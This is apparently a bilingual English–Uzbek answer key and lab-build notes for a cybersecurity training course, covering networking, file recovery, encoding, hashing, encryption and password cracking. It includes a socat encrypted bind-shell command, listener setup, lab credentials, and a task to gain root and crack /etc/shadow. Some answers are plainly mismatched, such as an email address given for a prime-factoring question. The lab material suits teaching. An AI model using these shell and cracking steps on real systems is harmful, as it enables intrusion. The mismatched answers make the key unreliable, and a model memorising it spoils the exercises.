C. DNS
D. The network interface card (NIC)
Agar kompyuter internet va boshqa hostlarga ulana olsa, lekin muayyan ichki hostga ulana olmasa, muammo nimada bo‘lishi mumkin? (Javobga mos keladigan harfni kiriting)
A. Yo‘naltirish (Routing)
B. Switch
C. DNS
D. Tarmoq interfeysi kartasi (NIC)
Javob: A
6
To begin, ssh into the exercise host with "Haady:HaAdy00".
The exercise host can't reach www.red0troubleshoot.com. The host has an internal DNS server at 127.0.0.1. Find out what the issues are with this connection, fix them, and get the flag by running curl http://www.red0troubleshoot.com.
Hint: Did you check the routing table?
You can find the IP of the web server after adding the correct DNS entry in the resolv.conf file.
Boshlash uchun "haad:Haad" login ma'lumotlari yordamida mashq hostiga SSH orqali kiring.
Mashq hosti **www.red0troubleshoot.com** saytiga ulana olmayapti. Hostda ichki DNS server 127.0.0.1 manzilida joylashgan. Ushbu ulanishdagi muammolarni aniqlang, ularni tuzating va quyidagi buyruqni bajarib flagni oling:
`curl
Yordam: Yo'naltirish jadvalini tekshirdingizmi?
To‘g‘ri DNS yozuvini **resolv.conf** fayliga qo‘shgandan so‘ng, veb-serverning IP manzilini topishingiz mumkin.
Javob: TROUBLESHOOT{Muammo_HECH_QACHON_Tarmoq_Emas}
senary
1. Foydalanuvchi tizimga SSH orqali (Haad:Haad) kiradi.
2. Foydalanuvchi’ga /etc/resolv.conf file’ni edit qilishga huquq bo`lishi kerak.
3. Foydalanuvchi interface edit qilishga huquq bo`lishi kerak
4. Foydalanuvchi shu saytga kira olmaydi. Serverda boshqa interface’da shu website ishlab turgan bo`ladi. Machine’da esa bu interface routing table’ga qo`shilmagan bo`lishi shart! Agarda foydalanuvchi routing table’ga qo`shsa unga 2chi interface’da ishlab turgan tarmoqga access bo`ladi.
5. Website’da flag bo`ladi
15.6.1
1
Deleting a file from any computer is unrecoverable. (True/False)
Har qanday kompyuterdan faylni o‘chirish tiklanmaydigan jarayondir. (To’g’ri/Noto’g’ri)
Javob: Noto'g'ri
2
When a critical mistake happens, what is the first thing we should do?
A. Stop and breathe
B. Panic
C. Seek help
D. Write a resignation letter
Jiddiy xato sodir bo‘lganda, birinchi navbatda nima qilishimiz kerak?
A. To‘xtab nafas olishimiz
B. Sarosimaga tushish
C. Yordam so‘rash
D. Ishdan bo‘shash to‘g‘risida ariza yozish
Javob: A
3
There is only one way to recover a deleted file. (True/False)
O‘chirilgan faylni tiklashning faqat bitta usuli mavjud. (To’g’ri/Noto’g’ri)
Javob: Noto'g'ri
4
The actions taken after a file is deleted are important to consider to be able to recover the file. (True/False)
Fayl o‘chirilgandan keyin amalga oshirilgan harakatlar uni tiklash imkoniyatini hisobga olishda muhimdir. (To’g’ri/Noto’g’ri)
Javob: To’g’ri
5
Which of the following is a file recovery tool? (Enter the letter corresponding to the answer)
A. Kismet
B. nmap
C. Wireshark
D. foremost
Quyidagilardan qaysi biri fayl tiklash vositasidir? (Javobga mos keladigan harfni kiriting)
A. Kismet
B. nmap
C. Wireshark
D. foremost
Javob: d
6
To begin, ssh into the exercise host with haad:haad.
NOTE: Please revert this machine before doing this particular exercise. A jpg file has been deleted from the exercise host. Using what you learned in this section, recover that file. The offsec user has sudo privileges for what is needed and a special script called "chownHomeDir.sh" will change the ownership of the offsec directory to haad:haad The flag will be in the recovered image.
Hint: Navigate to where the image is at and run "python -m SimpleHTTPServer". From there, you can open a web browser on your Kali host and enter the host IP on port 8000. As an example, if my host is 192.168.50.65, I would enter 192.168.50.65:8000.
Take a look at how this host is partitioned. Are you looking in the right one?
Pay attention to the type of file being recovered.
Boshlash uchun, **haad:haad** login ma'lumotlari yordamida mashq hostiga SSH orqali kiring.
**Eslatma:** Ushbu mashqni bajarishdan oldin mashinani qayta tiklang. Mashq hostida bir **jpg** fayl o‘chirilgan. Ushbu bo‘limda o‘rgangan bilimlaringizdan foydalanib, faylni tiklang. **haad** foydalanuvchisi kerak bo‘lgan ishlar uchun **sudo** imtiyozlariga ega va maxsus skript, **chownHomeDir.sh**, **haad** katalogining egalik huquqini **haad:haad** ga o'zgartiradi. Bayroq tiklangan faylda bo'ladi.
Yordam: Rasm joylashgan jildga o'ting va quyidagi buyruqni bajaring:
`python -m SimpleHTTPServer`
Shundan so'ng, Kali hostingizdagi veb-brauzerni oching va host IP-manzilini 8000-port bilan kiriting. Masalan, agar mening hostim 192.168.50.65 bo'lsa, men quyidagicha kiraman:
`192.168.50.65:8000`
Ushbu host qanday bo‘linganiga e’tibor bering. To‘g‘ri bo‘limni tekshiryapsizmi?
Tiklanayotgan fayl turiga e’tibor qarating.
Javob: TROUBLESHOOT{Siz_Mening_Qutqaruvchimisiz}
senary
1. Tizimda foremost tool o`rnatilingan bo`lishi kerak. Va haad uscerga uni ishlatish uchun huquq bo`lishi kerak.
2. Foydalanuvchi bu tool bilan o`chirilgan rasmlarni tiklab oladi.
3. /home/haad/ folder’da script bo`ladi. Foydalanuvchiga bu sript’ni root huquqi bilan ishlatish uchun huquq beriladi. bu sript root userga tegishli hamma narsani haad foydalanuvchisi nomiga o`tgazib beradi
3. Siz (dasturchilar) 2ta rasmni tizimga yuklab qo`yasiz, va user log in qilganda uni o`shirib yuborasiz. Foydalanuvchi uni qayta tiklagandan so`ng uni o`ziga yuklag oladi.
Vaqtinchalik Web server ko`tarilmoqda
Rasmlarni o`zining mashinasida yuklab olinmoqda
16. Cryptography
16.2.1
1
What is 234 decimal in binary?
234 o'nlik sonini ikkilikka o'tkazganda qanday ko'rinishda bo'ladi?
Javob: 11101010
2
What is 10010101 binary in decimal?
10010101 ikkilik sonini o'nlikka o'tkazganda qanday qiymat bo'ladi?
Javob: 149
3
What is the subnet mask represented by 11111111.11111111.11100000.00000000
"11111111.11111111.11100000.00000000 bilan ifodalangan subnet mask (osttarmoq niqobi) qaysi?"
Javob: 255.255.224.0
4
How many network bits are ones in the subnet mask of 255.128.0.0 ?
"255.128.0.0 subnet maskida nechta tarmoq biti birlikka teng?"
Javob: 9
16.2.2
1
What is 0xA1 in decimal?
"0xA1 o'nlik tizimda qanday qiymatga teng?"
Javob: 161
2
What is 162 in hexadecimal?
"162 o'n oltilik tizimda qanday qiymatga teng?"
Javob: A2
3
"Let's review a sample TCP header's hexdump. Map the dump with the TCP header structure and answer the following questions.
The TCP header structure is in Figure 2 on the following Nmap Website page: https://nmap.org/book/tcpip-ref.html
What is the source port number in decimal?"
"Keling, namunaviy TCP sarlavhasi (header) ning hexdumpini ko‘rib chiqamiz. Dumpni TCP sarlavhasi tuzilmasi bilan moslang va quyidagi savollarga javob bering.
TCP sarlavhasi tuzilmasi Nmap veb-saytidagi 2-rasmda berilgan:
Manba port raqami (source port) o‘nlik sanoq tizimida qanday?"
Javob: 60946
4
What is the destination port number in decimal?
Manzil port raqami o‘nlik sanoq tizimida qanday?
Javob: 443
5
What is the acknowledgment number in decimal?
Tasdiqlash raqami o‘nlik sanoq tizimida qanday?
Javob: 0
16.3.1
1
According to ASCII, what is the "R" character in hexadecimal?
ASCII ga ko‘ra, "R" belgisi o’n oltilik sanoq tizimida qanday?
Javob: 52
2
According to ASCII, what character is decimal 40 (28 in hexadecimal)?
ASCII ga ko‘ra, o‘nlik 40 (o‘n oltilik 28) qanday belgi?
Javob: (
3
According to ASCII, what control character is decimal 10 (0A in hexadecimal)?
ASCII ga ko‘ra, o‘nlik 10 (o‘n oltilik 0A) qaysi boshqaruv belgisi?
Javob: LF
4
Decode the following hexadecimal numbers to ASCII characters:
hint: You can leverage xxd's reverse operation.
Quyidagi o‘n oltilik (hexadecimal) raqamlarni ASCII belgilariga dekod qiling:
hint: xxdning teskari amalidan foydalanishingiz mumkin.
Javob: HD{d2cd8253361a9c732d21ca1d336599cc}
Senary
48447B64326364383235333336316139633733326432316361316433333635393963637D
Bu haad flagi
5
Convert the encoded.file file into a readable format. The solution to the exercise is the ASCII equivalent of the contents of the decoded file.
`encoded.file` faylini o‘qiladigan formatga aylantiring. Mashqning yechimi dekod qilingan fayl tarkibining ASCII muqobilidir.
Javob: ACED
Senary
encode.file beriladi va buni kerakli formatini aniqlab decode qilishi kerak bo’ladi.
16.3.2
1
On Kali Linux, Base64 decode the linux_base64 file.
Kali Linuxda `linux_base64` faylini Base64 dan dekod qiling.
Javob: HD{bmljZSBqb2Ih}
Senary.
Foydalanuvchiga linux_base64 file tashlab beriladi. U fayl’da bu kontent ⬇️ bo`ladi faqat bu fileda base64ga encode qilingan holda bo’lishi kerak bo’ladi.
2 - o’zgartirish kiritildi.
Base64 encode the following string on Kali Linux: "Offensive Security".
hint: Make sure to exclude the new line character when encoding.
Kali Linuxda quyidagi satrni Base64 bilan kodlang: "Haad Training Center".
hint: Kodlashda yangi qator belgisini chiqarib tashlaganingizga ishonch hosil qiling.
Javob: SGFhZCBUcmFpbmluZyBDZW50ZXIK
16.3.3
1
Base64 encode the final-encoding-exercise file to transfer it to your Kali workstation. What are the last six characters of this file after it has been Base64 encoded?
`final-encoding-exercise` faylini Kali ish muhitingizga uzatish uchun Base64 bilan kodlang. Ushbu fayl Base64ga kodlanganidan keyin uning oxirgi olti belgisi qanday?
Javob: AAAA==
Senary
Foydalanuvchiga final-encoding-exercise fayli tashlab beriladi.
Agarda foydalanuvchi uni base64’da encode qilsa oxiri AAAA== shunaqa ko`rinishda bo`ladi.
2
Now decode this file and determine the file type. What type of file is it?
Endi ushbu faylni dekod qiling va fayl turini aniqlang. Bu qanday turdagi fayl?
Javob: gzip
Senary encoded.txt faylini decode qilish kerak va file buyrug’i bilan tekshirganda gzip chiqishi kerak base64 -d encoded.txt > decoded-file file decoded-file
3
Based on the results above, you should be able to interact with this file to create another kind of file, which will allow you to read its contents. What was the original name of the new file?
hint:
The tool used to transform the file may require you to add a file extension to it. Remember to research anything that you don't understand!
Yuqoridagi natijalarga asoslanib, ushbu fayl bilan o‘zaro aloqada bo‘lib, uning tarkibini o‘qishga imkon beradigan boshqa turdagi fayl yaratishingiz mumkin. Yangi faylning asl nomi qanday edi?
hint:
Faylni o‘zgartirish uchun ishlatilgan vosita unga fayl kengaytmasini qo‘shishingizni talab qilishi mumkin. Tushunmagan narsalaringizni tadqiq qilishni unutmang!
Javob: super-secret-file
Senary
yuqoridagi asl holatiga qaytarilgan faylni boshqa nom bilan saqlash kerak misol uchun .txt formatda keyin uni ochganda “super-secret-file” chiqishi kerak
4
Finally, decode the provided text. What is the resulting flag?
Nihoyat, berilgan matnni dekod qiling. Natijaviy flag(bayroq) qanday?
Javob: HD{Men-Kodlash-Bo‘yicha-Mutaxassisman!}
Senary
Video’da ko`rsatilinmagan
16.4.1
1
On the Kali Linux VM, create a file with the name test.txt by redirecting the output of the "echo test" command to it. What is the MD5 hash of the test.txt file we created?
hint: Use the md5sum utility
Kali Linux VMda echo test buyruq chiqishini yo‘naltirish orqali test.txt nomli fayl yarating. Yaratilgan test.txt faylining MD5 hashi qanday?
hint: `md5sum` vositasini qo'llang
Javob: d8e8fca2dc0f896fd7cb4cb0031ba249
Senary
Foydalanuvchi o`zi bajaradi.
2
Without changing the content of the file, rename the test.txt file we created to test2.txt. What is the hash of the test2.txt file?
Fayl tarkibini o‘zgartirmasdan, yaratilgan `test.txt` faylini `test2.txt` deb qayta nomlang. `test2.txt` faylining hashi qanday?
Javob: d8e8fca2dc0f896fd7cb4cb0031ba249
Senary
Foydalanuvchi o`zi bajaradi.
3
Create a new file with the name test3.txt by redirecting the output of the "echo test." command to it (notice the dot after the word test). What is the md5sum hash of this file?
`echo test.` buyruq chiqishini yo‘naltirish orqali `test3.txt` nomli yangi fayl yarating (diqqat qiling, "test" so‘zidan keyin nuqta bor). Ushbu faylning `md5sum` hashi qanday?
Javob: 4cc5a1d62b276a076e5b06b0df7efd27
Senary
Foydalanuvchi o`zi bajaradi.
4
How many characters are the md5sum digests in the previous exercises?
Oldingi mashqlardagi `md5sum` hashlari nechta belgidan iborat?
Javob: 32
Senary
Foydalanuvchi o`zi bajaradi.
5
Generate a large file with 8 MB of content and name it randomfile. To do this, use the following command: dd if=/dev/urandom of=randomfile bs=4M count=2. Then, calculate the MD5 hash of this file. How many characters does the digest consist of?
"8 MB hajmli katta fayl yaratib, unga randomfile nomini bering. Buni quyidagi buyruq yordamida bajaring:
dd if=/dev/urandom of=randomfile bs=4M count=2. Keyin ushbu faylning MD5 hashini hisoblang. Hash nechta belgidan iborat?"
Javob: 32
Senary
Foydalanuvchi o`zi bajaradi.
6
We can pipe a string to the wc command with the -c switch to count the number of characters in the string. Use the following command to count the number of characters in the digest. echo d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c . How many characters are in this digest?
Matndagi belgi sonini hisoblash uchun wc buyruqini -c kaliti bilan ishlatishimiz mumkin. Hashdagi belgi sonini hisoblash uchun quyidagi buyruqdan foydalaning:
echo d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c
Ushbu hash nechta belgidan iborat?
Javob: 33
Senary
Foydalanuvchi o`zi bajaradi.
7
You may recall that the echo command automatically appends an invisible newline character. This character is counted by the wc utility and should explain the unexpected result.
Repeat the steps above but use the -n switch to avoid including the new line character. Run the command echo -n d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c . What is the result once we remove the new line character?"
"echo buyrug‘i avtomatik ravishda ko‘rinmas yangi qator belgisini qo‘shishini eslang. Bu belgi wc dasturi tomonidan hisobga olinadi va kutilmagan natijani tushuntirishi mumkin.
Yuqoridagi bosqichlarni takrorlang, lekin yangi qator belgisini kiritmaslik uchun -n kalitidan foydalaning. Quyidagi buyruqni bajaring:
echo -n d8e8fca2dc0f896fd7cb4cb0031ba249 | wc -c
Yangi qator belgisi olib tashlanganda natija qanday bo‘ladi?"
Javob: 32
Senary
Foydalanuvchi o`zi bajaradi.
16.4.3
1
Find the SHA-256 hash of the string "Th151sth3fl4g". Calculate the hash on a Linux VM with the help of sha256sum and echo. Be aware of the postfix new line character of the echo command.
`Th151sth3fl4g` matnining SHA-256 hashini toping. Linux VMda `sha256sum` va `echo` yordamida hashni hisoblang. `echo` buyrug‘ining oxirida qo‘shiladigan yangi qator belgisiga e’tibor bering.
Javob: 2eea341c3610d93c4428d8c49666c08ff0f09f122fb2254607bc4f0f0946ff00
Senary
Foydalanuvchi o`zi bajaradi.
2
Find the SHA-1 sum of the string "Th151sth3fl4g". As before, calculate the hash on a Linux VM, but use sha1sum.
`Th151sth3fl4g` matnining SHA-1 hashini toping. Avvalgi kabi, Linux VMda hashni hisoblash uchun `sha1sum` dan foydalaning.
Javob: 4c61cc89516237aff7d9319cde9ecb5c5290a792
Senary
Foydalanuvchi o`zi bajaradi.
3
" Start the target Linux VM and execute the following command from the terminal: echo -n ""Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua"" > loremipsum.txt .
Calculate the SHA512 sum of the file loremipsum.txt."
hint: Copy and paste the command from the question. The '-n' option is important, as well.
"Nishondagi Linux VMni ishga tushiring va terminalda quyidagi buyruqni bajaring:
echo -n ""Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua"" > loremipsum.txt
loremipsum.txt faylining SHA-512 hashini hisoblang."
hint:
Buyruqni savoldan nusxalang va joylashtiring. `-n` opsiyasi ham muhim.
Javob: 871823e834a9210fb299f87ae7ec48d3ff8ca16119849d678b60ddb3bdc0eb5508a747913f01bb84733bbea1652356eedd37b33fd26b59e10904934bd2937aa3
Senary
Foydalanuvchi o`zi bajaradi. Lekin VM ichida qilishi kerak!
4
There are three files with known checksums in the /home/apprentice/hashcheck folder. One of the files was changed after the checksums were calculated and stored in files.sha256. What is the new checksum of the file that was modified?
`/home/apprentice/hashcheck` jildida nazorat hashlari oldindan ma’lum bo‘lgan uchta fayl mavjud. Ushbu fayllarning hashlari hisoblab chiqilgan va `files.sha256` fayliga saqlangan. Ushbu fayllardan biri hashlari saqlangandan keyin o‘zgartirilgan. O‘zgartirilgan faylning yangi hashi qanday?
Javob: 735355062f5c15899c2f545f09d43a104068d9204422756651c558b43683b12b
Senary
Yasalishi ko`rsatilingan
5
In /usr, there is a malicious file that matches this hash: "d61d579501ab8ff507120780191929d5" . Your task is to find the file. The command should run for no longer than one minute. What is the full path to the location of the malware?
hint:
Try researching how you can use the find command to do this.
`/usr` jildida ushbu hashga mos keluvchi zararli fayl mavjud: `"d61d579501ab8ff507120780191929d5"`. Sizning vazifangiz ushbu faylni topishdir. Buyruq bir daqiqadan ko‘proq ishlamasligi kerak. Zararli dastur joylashgan to‘liq fayl yo‘li qanday?
hint:
Buni amalga oshirish uchun `find` buyrug‘idan qanday foydalanish mumkinligini tadqiq eting.
Javob: /usr/bin/virus
Senary
/usr/bin/virus file’da oddiy bitta script bo`ladi. Uni md5sum hashini foydalanuvchiga beriladi. Uni foydalanuvchi qidirib topib, to`liq pathini beradi.
16.5.1
1
Which hashing algorithm generated the following hash?
Quyidagi hashni qaysi hashlash algoritmi yaratgan?
Javob: NTLM
Senary
Foydalanuvchi o`zi bajaradi.
2
What is the current default hashing algorithm for kali?
Kali Linuxning joriy odatiy (default) hashlash algoritmi qanday?
Javob: MD5
Senary
Foydalanuvchi o`zi bajaradi.
3
Which hashing algorithm generated the following hash?
Quyidagi hash qanday hashlash algoritmi mahsuli:
Javob: NTLM
Senary
Foydalanuvchi o`zi bajaradi. Lekin VM ichida qilishi kerak!
4
Which hashing algorithm generated the following hash?
Quyidagi hash qanday hashlash algoritmi mahsuli?
Javob: NTLM
Senary
Foydalanuvchi o`zi bajaradi.
5
Crack the following hash using https://crackstation.net/
Quyidagi hashni https://crackstation.net/ yordamida buzib (crack) ko‘ring:
Javob: password123
Senary
Foydalanuvchi o`zi bajaradi.
6
Crack the following hash using https://crackstation.net/
Quyidagi hashni https://crackstation.net/ yordamida buzib (crack) ko‘ring
Javob: password12345
Senary
Foydalanuvchi o`zi bajaradi. Lekin VM ichida qilishi kerak!
7
Which hashing algorithm generated the hash from the previous exercise?
Oldingi mashqdagi hash qaysi hashlash algoritmi yordamida hosil etilgan?
Javob: NTLM
Senary
Foydalanuvchi o`zi bajaradi.
8
What is the current default hashing algorithm on Windows?
Windows operatsion tizimining joriy odatiy (default) hashlash algoritmi qanday?
Javob: NTLM
Senary
Foydalanuvchi o`zi bajaradi.
16.5.2
1
This is a line taken from an /etc/shadow file:
hint:
What is the salt used in this password?
https://unix.stackexchange.com/questions/642570/the-format-of-encrypted-password-in-etc-shadow
In the above link, the salt for the question is F5Jx5fExrKuPp53xLKQ..1
The answer should not have the $ and should include the /
Bu /etc/shadow faylidan olingan satr:
Ushbu parolda ishlatilgan salt qanday?
[https://unix.stackexchange.com/questions/642570/the-format-of-encrypted-password-in-etc-shadow](https://unix.stackexchange.com/questions/642570/the-format-of-encrypted-password-in-etc-shadow)
Yuqoridagi havolada savol uchun salt quyidagicha: `F5Jx5fExrKuPp53xLKQ..1`
Javob `$` belgisiz bo‘lishi va `/` belgisini o‘z ichiga olishi kerak.
Javob: 0WzBWAjJ52qoJ3iqHwwWI/
Senary.
Foydalanuvchi o`zi bajaradi
2
Create a salted hash using the SHA-512-based crypt of password "foobar" with the salt "M3vwJPAueK2a1vNM".
hint: Use the mkpasswd tool on the Kali Linux VM to generate the salted password hash.
SHA-512 asosidagi `crypt` yordamida `"foobar"` paroli uchun `"M3vwJPAueK2a1vNM"` salt bilan hashlangan natija yarating..
hint: Kali Linux VMda `mkpasswd` vositasidan foydalanib, saltlangan parol hashini yarating.
Javob: $6$M3vwJPAueK2a1vNM$uILLUy6MrFVQEJWIy8dw94oMfdy1fuHKk.yGDk89S14k3UbK3Em0wlanQAJ1RhicTH2OOsrhfMpaNnQS0s.C60
Senary.
Foydalanuvchi o`zi bajaradi
16.5.3
1
Use John the Ripper on the Kali Linux VM to crack the following hash:
Kali Linux VMda John the Ripper vositasidan foydalanib, quyidagi hashni buzib (crack) ko‘ring:
Javob: $$spongebob13$$
Senary.
Foydalanuvchi o`zi bajaradi
2
Use John the Ripper on the Kali Linux VM to crack the following hash:
Kali Linux VMda John the Ripper vositasidan foydalanib, quyidagi hashni buzib (crack) ko‘ring:
Javob: princess1
Senary.
Foydalanuvchi o`zi bajaradi
3
Use John the Ripper on the Kali Linux VM to crack the following hash:
Kali Linux VMda John the Ripper vositasidan foydalanib, quyidagi hashni buzib (crack) ko‘ring:
Javob: angel13
Senary.
Foydalanuvchi o`zi bajaradi
16.5.3
1
Decode the following string with the ROT13 algorithm:
Quyidagi matnni ROT13 algoritmi yordamida dekod qiling:
Javob: 153528a904b13716a8bb0e11693d9768a2fc8a7c38d879bcc930f707013eff03
Senary.
Foydalanuvchi o`zi bajaradi
16.6.5
1
Encrypt the file called secret-message with AES256 using gpg. Before you encrypt it, make sure the name is "secret-message" and not the generated name after downloading it. Also, provide the password 'test' when prompted. How large in bytes is the output file after the encryption algorithm is applied?
`secret-message` nomli faylni `gpg` yordamida AES256 bilan shifrlang. Shifrlashdan oldin, fayl nomining ""secret-message"" ekanligiga ishonch hosil qiling, yuklab olingandan keyin avtomatik o‘zgargan bo‘lsa, uni qayta nomlang. Shuningdek, so‘ralganda parol sifatida `'test'` ni kiriting. Shifrlash algoritmi qo‘llangandan keyin chiqish fayli hajmi baytlarda qancha bo‘ladi?
Javob: 120
Senary
Foydalanuvchiga secret-message nomli fayl beriladi.
Qanday qilinishi ko`rsatilgan.
2
Does the length of a particular key impact the length of the output ciphertext?
Muayyan kalit uzunligi chiqish shifrmatn (ciphertext) uzunligiga ta’sir qiladimi?
Javob: yo'q
Senary
Foydalanuvchi o`zi bajaradi.
3
Examine the file called decrypt-me.gpg. Which cipher was used to encrypt this file?
decrypt-me.gpg faylini tekshiring. Ushbu faylni shifrlash uchun qaysi shifr ishlatilgan?
Javob: 4cc5a1d62b276a076e5b06b0df7efd27
Senary
4
Decrypt the decrypt-me.gpg file with the password "thiskeyis100%secure", and retrieve the flag!
`decrypt-me.gpg` faylini `"thiskeyis100%secure"` paroli bilan deshifrlang va flagni oling!
Javob: HD{simmetrikshifrlash}
Senary:
(Fayl qanday yasalishi oldingi senarida yozilgan
Foydalanuvchi o`zi bajaradi.
5
Another application of symmetric encryption can be found within the VPN to this very lab! Download the universal.ovpn VPN pack to connect to this lab, and examine the contents with the cat command. How many bits is the OpenVPN static key inside the file?
Simmetrik shifrlashning yana bir qo‘llanilishi aynan shu laboratoriyaga ulanadigan VPN ichida mavjud! Ushbu laboratoriyaga ulanishingiz uchun `universal.ovpn` VPN to‘plamini yuklab oling va uning tarkibini `cat` buyrug‘i bilan tekshiring. Fayl ichidagi OpenVPN turg'un(static) kaliti nechta bitdan iborat?
Javob: 32
Senary
Shu faylni foydalanuvchiga beriladi
Result:
6
Which encryption cipher does the VPN use?
hint: Review the openvpn output.
VPN qaysi shifrlash shifridan foydalanadi?
hint: OpenVPN taqdim chiqishi(output)ni ko‘rib chiqing.
Javob: AES-128-CBC
Senary
Foydalanuvchi o`zi bajaradi.
16.7.2
1
Download and import the key-pair belonging to Melaine. What email address was used to generate the key-pair?
hint: Use the "--import" flag to import the keys to your local GPG keychain.
Melainega tegishli kalit juftligini yuklab oling va import qiling. Ushbu kalit juftligini yaratish uchun qaysi elektron pochta manzili ishlatilgan?
hint: Kalitlarni mahalliy GPG kalit zanjiringizga import qilish uchun `--import` flagidan foydalaning.
Javob: melanie@example.com
Senary.
Foydalanuvchi o`zi bajaradi
2
Use the passphrase "princess123" to decrypt flag.gpg. What is the flag?
`flag.gpg` faylini deshifrlash uchun `"princess123"` parol iborasidan foydalaning. Flag nima?
Javob: HD{Qirollik-uchun-bayroq}
Senary.
Comment qismiga Flag berilib ketiladi
dsds
16.7.3
1
Given the product N = 382387, what are its prime factors p and q? Enter the answer in the format "123 456"
Berilgan `N = 382387` sonining tub omillari `p` va `q` qanday? Javobni quyidagi formatda kiriting: `"123 456"`
Javob: melanie@example.com
Senary.
Foydalanuvchi o`zi bajaradi
2
Use the passphrase "princess123" to decrypt flag.gpg. What is the flag?
`flag.gpg` faylini deshifrlash uchun `"princess123"` parol iborasidan foydalaning. Flag nima?
Javob: HD{Qirollik-uchun-bayroq}
Senary.
Comment qismiga Flag berilib ketiladi
dsds
16.7.4
1
Use the web-based Kali browser VM to generate an SSH key-pair for the kali user. What is the full path of the default generated private key?
Kali foydalanuvchisi uchun SSH kalit juftligini yaratish uchun veb-asosidagi Kali brauzer VM-dan foydalaning. Standart tarzda yaratilgan shaxsiy kalitning toʻliq yoʻli qanday?
Javob ; /home/kali/.ssh/id_ed25519
Senary
videoda ko’rsatilmagan
2
When copying a key to a remote server, should we copy over our private key or public key?
Kalitni masofaviy serverga nusxalashda shaxsiy kalitimizni yoki ochiq kalitimizni nusxalashimiz kerakmi?
javob ; public
Senariy
Foydalanuvchini o’zi bajaradi
3
After following the instructions to create the authorized_keys file during SSH key generation, use the diff command with the -s flag to compare it with id_rsa.pub. What is the last word of the output of this command?
SSH kalitini yaratish paytida ko'rsatmalarga amal qilib, `authorized_keys` faylini yaratgandan so'ng, uni `id_rsa.pub` bilan solishtirish uchun `diff` buyrug'ini `-s` bayrog'i bilan ishlating. Ushbu buyruqning chiqishidagi oxirgi so'z qanday?
Javob ; identical
Senary
Videoda ko’rsatilmagan
16.7.5
1
Open an encrypted bind shell to the target machine on TCP port 4443 and obtain the flag.
Nishon mashinaga TCP 4443-port orqali shifrlangan biriktirilgan qobiq (bind shell) oching va bayroqni (flag) oling.
Javob ; HD{kriptografik-qobiqchalar-quvonchli}
Senariy
Foydalanuvchi o’zini shellida ushbu buyruq orqali shell olganda unga HD{kriptografik-qobiqchalar-quvonchli} flagni bersin
socat - OPENSSL:target_ip:4443,verify=0
2
Generate a certificate and then start a listener on your attacking machine. Supply the IP address and port number your listener is running on to the /home/apprentice/flag binary to obtain the flag.
Sertifikat yarating va keyin hujum qilayotgan mashinangizda tinglovchini (listener) ishga tushiring. Bayroqni (flag) olish uchun `/home/apprentice/flag` ikkilik fayliga tinglovchi ishlayotgan IP manzil va port raqamini kiriting.
Javob ; HD{kriptografik-qobiqchalar-saranjom}
Senary
Birinchi sertifikat hosil qilib olishi kerak
foydalanuvchi hujum targetida shell uchun listening qilib turadi va /home/apprentice/flag ushbu yo’ldagi flag faylini ./flag target_ip port bilan ishga tushurganda HD{kriptografik-qobiqchalar-saranjom} flagni berishi kerak
16.7.6
1
Decrypt the http_basic_auth.pcap packet capture with the help of the http_basic_auth.key.txt log file that contains the per-session secrets keys. Find the content of the downloaded secret.txt file in the traffic capture.
`http_basic_auth.pcap` paketlar yig‘indisini sessiya bo‘yicha maxfiy kalitlarni o‘z ichiga olgan `http_basic_auth.key.txt` log fayli yordamida shifrdan oching. Traffic yig‘indisida yuklab olingan `secret.txt` faylining tarkibini toping.
Javob ; Bu_bir_flag
Senary
Foydalanuvchini o’zi bajaradi
2
What password was provided for the Basic Authentication in the traffic capture?
Trafik yig‘indisida Basic Authentication (Asosiy tasdiqlov) uchun qanday parol taqdim etilgan?
Javob ; m6n6k5l1t
Senary
Foydalanuvchini o’zi bajaradi file bilan bog’liq
3
What is the value of the Common Name in the subject field of the server provided certificate?
Server tomonidan taqdim etilgan sertifikatning subyekt maydonidagi Common Name (Umumiy Nom) qiymati qanday?
Javob ; b@yr0q_q6bul_q1l1na7ak
Senary
Foydalanuvchini o’zi bajaradi
16.8.1
1
Access the victim target using the credentials apprentice:kadabra. Obtain the flag hiding in the apprentice's mailbox.
`apprentice:kadabra` hisob ma'lumotlari yordamida qurbon qurilmaga kirib, `apprentice` pochta qutisida yashiringan bayroqni (flag) oling.
Javob ; HD{Oddiy-matn-hujjat-formati}
Senary
/var/mail/ papkasini ichida apprentice fayli bo’lishi kerak u fayl ichida base64 kod bo’lishi kerak shu kodni pdf formatga aylantirganda HD{Oddiy-matn-hujjat-formati} flagni bersin
2
Obtain the private SSH key hiding in the user's mailbox. Decode the key and use it to gain root access on the victim machine. What is the md5sum of the unencrypted file in /root?
Foydalanuvchi pochta qutisida yashiringan shaxsiy SSH kalitini oling. Kalitni dekodlang va uni qurbon mashinasida root kirish huquqini olish uchun ishlating. `/root` katalogidagi shifrlanmagan faylning `md5sum` qiymati qanday?
Javob ; fcbb73e413bd7745f1612c7c31c63fff
Senary
yuqoridagi apprentice faylni ichida id_rsa uchun key ham bo’lishi u keyni base64 da dekod qilib keyin id_rsa fayliga saqlash kerak va shu id_rsa bilan rootga ulanganda megic.txt fayli bo’lishi kerak md5sum megic.txt buyrug’ini ishlatganda ushbu flagni berishi kerak fcbb73e413bd7745f1612c7c31c63fff
3
Decrypt the encrypted file in /root. What is the flag?
`/root` katalogidagi shifrlangan faylni oching. Bayroq (flag) qanday?
Javob ; HD{Hatto-sehrgarlar-ham-entropiyaga-muhtoj}
Senary
/root ichida SeeNoEvil.txt.gpg fayl bo’lishi kerak gpg —decrypt SeeNoEvil.txt.gpg buyrug’ini bajarganda ushbu flagni berishi kerak HD{Hatto-sehrgarlar-ham-entropiyaga-muhtoj}
4
Finally, extract /etc/shadow and crack the passwords. What is root's password?
Nihoyat, `/etc/shadow` faylini ajratib oling va parollarni buzib kirish (crack) orqali toping. Root foydalanuvchisining paroli qanday?
Javob ; spellbound
Senary
etc/shadow faylidagi rootni parolini john yoki boshqa crack qiladigan vositalar orqali crack qilganda spellbound parolini bersin
Want to print your doc?
This is not the way.
This is not the way.
Try clicking the ⋯ next to your doc name or using a keyboard shortcut (
CtrlP
) instead.